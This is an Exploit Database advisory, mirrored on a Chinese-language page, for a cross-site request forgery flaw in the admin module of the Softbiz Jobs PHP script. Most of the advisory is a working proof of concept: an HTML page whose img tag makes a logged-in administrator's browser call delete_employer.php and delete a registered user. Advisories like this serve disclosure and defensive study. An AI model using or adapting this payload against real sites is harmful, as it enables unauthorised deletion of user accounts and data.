Softbiz Jobs – Cross-Site Request Forgery

• Exploit Database
• 9 阅读

• 作者： pratul agrawal
  日期： 2010-02-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11543/

•  =======================================================================
   
   Softbiz Jobs CSRF Vulnerability
   =======================================================================
   
   by
   
   Pratul Agrawal
   
   
  # Vulnerability found in- Admin module
   
  # email Pratulag@yahoo.com
   
  # company aksitservices
   
  # Credit by Pratul Agrawal
  
  # Downloadhttp://www.softbizscripts.com/
  
  # Scriptsoftbizscripts
  
   
   
  # Proof of concept
  
  Script to delete the registered user through Cross Site request forgery
  
   ...................................................................................................................
  
  <html>
  
  <body>
  
  <img src=http://server/scripts/seojobs/admin/delete_employer.php?id=[USER ID] /> 
  
  </body>
  
  </html>
  
  
   ...................................................................................................................
  
  
  
  After execution refresh teh page and u can see that user having id=20 get deleted automatically.
  
   
  #If you have any questions, comments, or concerns, feel free to contact me.